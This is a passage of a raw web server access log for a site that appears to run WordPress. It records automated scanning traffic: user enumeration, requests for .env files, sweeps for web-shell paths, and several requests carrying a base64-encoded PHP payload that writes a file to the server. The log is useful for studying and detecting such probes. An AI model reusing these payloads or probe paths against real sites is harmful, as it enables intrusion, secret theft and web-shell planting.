- [10/Oct/2023:12:05:21 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.81.39.201 - - [11/Oct/2023:11:18:07 +0700] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 205.210.31.6 - - [12/Oct/2023:03:05:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 45.81.39.201 - - [12/Oct/2023:10:11:43 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [12/Oct/2023:10:12:13 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [12/Oct/2023:10:12:28 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [12/Oct/2023:10:12:45 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [12/Oct/2023:10:12:59 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [12/Oct/2023:10:13:12 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 165.22.213.86 - - [13/Oct/2023:20:24:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 83.143.116.3 - - [14/Oct/2023:07:47:02 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 83.143.116.3 - - [14/Oct/2023:07:47:07 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 83.143.116.3 - - [14/Oct/2023:07:47:10 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 63.32.104.24 - - [14/Oct/2023:11:51:05 +0700] "GET / HTTP/1.1" 301 162 "-" "Plesk screenshot bot https://support.plesk.com/hc/en-us/articles/10301006946066" 65.154.226.168 - - [15/Oct/2023:11:25:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.5938.88 Safari/537.36" 65.154.226.168 - - [15/Oct/2023:11:29:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.5938.88 Safari/537.36" 45.81.39.201 - - [15/Oct/2023:21:57:20 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "python-requests/2.27.1" 45.81.39.201 - - [17/Oct/2023:12:55:55 +0700] "GET /nf_tracking.php HTTP/1.1" 301 162 "-" "python-requests/2.27.1" 188.120.243.13 - - [17/Oct/2023:22:49:40 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 188.120.243.13 - - [17/Oct/2023:22:49:44 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 188.120.243.13 - - [17/Oct/2023:22:49:47 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 51.195.94.201 - - [18/Oct/2023:01:27:31 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 51.195.94.201 - - [18/Oct/2023:01:27:32 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 45.81.39.201 - - [18/Oct/2023:13:57:44 +0700] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2NqbXZvLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 167.248.133.125 - - [19/Oct/2023:01:51:37 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 97.79.236.49 - - [23/Oct/2023:01:35:24 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 97.79.236.49 - - [23/Oct/2023:01:35:30 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 97.79.236.49 - - [23/Oct/2023:01:35:34 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 87.236.176.100 - - [23/Oct/2023:04:37:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 183.136.225.5 - - [23/Oct/2023:07:14:27 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 183.136.225.5 - - [23/Oct/2023:07:14:50 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.5 - - [23/Oct/2023:07:15:08 +0700] "GET /'https://wp.lautnusantara.com/wp-includes/css/dashicons.min.css?ver=6.3.2' HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.5 - - [23/Oct/2023:07:15:11 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 51.195.94.201 - - [23/Oct/2023:15:30:46 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 51.195.94.201 - - [23/Oct/2023:15:30:46 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 35.212.10.132 - - [24/Oct/2023:01:10:08 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.212.10.132 - - [24/Oct/2023:01:10:14 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.212.10.132 - - [24/Oct/2023:01:10:17 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.212.10.132 - - [24/Oct/2023:01:10:17 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.212.10.132 - - [24/Oct/2023:01:10:17 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 51.195.94.201 - - [26/Oct/2023:04:08:04 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 51.195.94.201 - - [26/Oct/2023:04:08:04 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 199.45.155.33 - - [26/Oct/2023:09:43:31 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 35.214.182.31 - - [26/Oct/2023:18:55:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.182.31 - - [26/Oct/2023:18:55:22 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.182.31 - - [26/Oct/2023:18:56:08 +0700] "GET /ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.182.31 - - [26/Oct/2023:18:56:08 +0700] "GET /app-ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.182.31 - - [26/Oct/2023:18:56:11 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.182.31 - - [26/Oct/2023:18:56:11 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.182.31 - - [26/Oct/2023:18:56:11 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 173.201.188.181 - - [27/Oct/2023:08:56:37 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 173.201.188.181 - - [27/Oct/2023:08:56:41 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 173.201.188.181 - - [27/Oct/2023:08:56:45 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 199.45.154.19 - - [27/Oct/2023:15:17:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 46.101.109.24 - - [27/Oct/2023:16:58:25 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 68.178.148.77 - - [29/Oct/2023:00:30:28 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 68.178.148.77 - - [29/Oct/2023:00:30:32 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 68.178.148.77 - - [29/Oct/2023:00:30:35 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.81.39.209 - - [29/Oct/2023:08:19:07 +0700] "GET / HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 45.81.39.201 - - [30/Oct/2023:12:22:29 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [30/Oct/2023:12:22:52 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [30/Oct/2023:12:23:13 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [30/Oct/2023:12:23:24 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [30/Oct/2023:12:23:47 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [30/Oct/2023:12:24:05 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 50.63.2.0 - - [31/Oct/2023:03:51:52 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 50.63.2.0 - - [31/Oct/2023:03:51:56 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 50.63.2.0 - - [31/Oct/2023:03:52:00 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 207.241.235.133 - - [01/Nov/2023:12:52:54 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/0569f25 warc/v0.8.33" 51.195.94.201 - - [01/Nov/2023:20:22:20 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 91.92.252.169 - - [02/Nov/2023:07:23:34 +0700] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2R3cndwLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Nov/2023:13:43:52 +0700] "GET /wp-pano.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 110.39.55.29 - - [03/Nov/2023:02:37:04 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 110.39.55.29 - - [03/Nov/2023:02:37:08 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 110.39.55.29 - - [03/Nov/2023:02:37:12 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 148.72.246.189 - - [03/Nov/2023:23:45:12 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 148.72.246.189 - - [03/Nov/2023:23:45:16 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 148.72.246.189 - - [03/Nov/2023:23:45:20 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [04/Nov/2023:13:26:25 +0700] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2l3eWt3LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [05/Nov/2023:09:26:10 +0700] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Nov/2023:09:26:23 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Nov/2023:09:26:39 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Nov/2023:09:26:52 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Nov/2023:09:27:04 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Nov/2023:09:27:21 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Nov/2023:09:27:32 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 3.253.138.131 - - [05/Nov/2023:12:55:47 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 142.44.243.214 - - [08/Nov/2023:03:33:59 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 142.44.243.214 - - [08/Nov/2023:03:34:04 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 142.44.243.214 - - [08/Nov/2023:03:34:08 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 51.195.94.201 - - [08/Nov/2023:04:20:40 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 101.99.90.175 - - [10/Nov/2023:01:05:48 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 101.99.90.175 - - [10/Nov/2023:01:05:51 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 101.99.90.175 - - [10/Nov/2023:01:05:53 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 146.190.212.109 - - [10/Nov/2023:15:58:20 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 205.210.31.59 - - [11/Nov/2023:18:13:47 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 183.136.225.46 - - [12/Nov/2023:01:39:46 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 91.92.252.169 - - [12/Nov/2023:12:56:00 +0700] "GET /chosen.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [12/Nov/2023:12:56:15 +0700] "GET /wp-head.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [12/Nov/2023:12:56:24 +0700] "GET /.well-known/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 204.188.215.250 - - [13/Nov/2023:21:47:51 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 204.188.215.250 - - [13/Nov/2023:21:47:55 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 204.188.215.250 - - [13/Nov/2023:21:47:59 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 167.248.133.50 - - [15/Nov/2023:09:47:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.247 - - [15/Nov/2023:10:06:10 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.92.252.169 - - [15/Nov/2023:22:09:16 +0700] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [15/Nov/2023:22:09:37 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - 